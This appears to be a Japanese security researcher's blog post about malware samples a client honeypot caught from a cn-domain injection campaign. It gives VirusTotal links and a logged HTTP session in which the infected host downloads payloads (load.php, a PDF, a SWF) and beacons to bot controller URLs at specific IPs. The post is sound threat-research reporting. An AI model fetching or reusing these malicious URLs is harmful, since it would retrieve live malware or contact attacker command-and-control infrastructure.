cnドメインを利用したインジェクション　検体編

TTTT＠初投稿です。

国内 Web サービスが扱っている URL 情報にマルウェア感染を引き起こすものがあるかクライアントハニーポットで調査していたら、jyakeさんと同じく「cnドメインを利用したインジェクション 8080 ＋　index.php型」を発見しました。

ドメインは、 filmoflife.cn, bigtopstats.cn など調査するたびに変わってました。cn ドメインをロードさせる iframe を特定できず、特徴的なタグは未確認です。

クライアントハニーポットで収集できた検体4つ。アンチウイルスでの検知率は低いです。特に beep.sys が気になります。

http://www.virustotal.com/jp/analisis/e3a35e544b5176b0fce320c4dda1a2c62e30d3d3e2f4c9009c06904354901732-1245260804

http://www.virustotal.com/jp/analisis/5a81a46a3bdd19dafc6c87d277267a5d44f3a1b5302f2cc1111d84b7bad5610d-1245255539

http://www.virustotal.com/jp/analisis/61e41053fbdd292ad02201ba9fecce23eb8f7417fb74da856ed49a3e7931aff0-1245231435

http://www.virustotal.com/jp/analisis/b051742b6aabfe5bd0ebf90f5371bb7fb7b13d2b559b6e233d1c7c9d5fed649f-1245229754

トーレスログcninjesample.txt

感染前後のHTTPセッション

 GET	http://77.37.19.179/index.php	text/html
 GET	http://77.37.19.179/index.php	text/html
 GET	http://77.37.19.179/load.php?id=0	application/octet-stream
 GET	http://78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=2900227141&rnd=981633	text/html;
 GET	http://78.109.29.116/new/controller.php?action=report&guid=0&rnd=123&uid=1&entity=1241530597:unique_start;1243627542:unique_start	text/html;
 POST	http://78.109.29.114/good/receiver/online	text/html;
 GET	http://77.37.19.179/cache/readme.pdf	application/pdf
 GET	http://77.37.19.179/cache/flash.swf	application/x-shockwave-flash
 GET	http://77.37.19.179/cache/readme.pdf	application/pdf
 GET	http://77.37.19.179/cache/flash.swf	application/x-shockwave-flash
 GET	http://78.109.29.116/new/controller.php?action=bot&entity_list=1241530597,1243627542&uid=1&first=1&guid=2900227141&rnd=981633	text/html;
 GET	http://78.109.29.116/new/controller.php?action=report&guid=0&rnd=123&uid=1&entity=1241530597:repeat_start	text/html;
 POST	http://78.109.29.114/good/receiver/online	text/html;

あからさまな HTTPボットのような感じがします。

by TTTT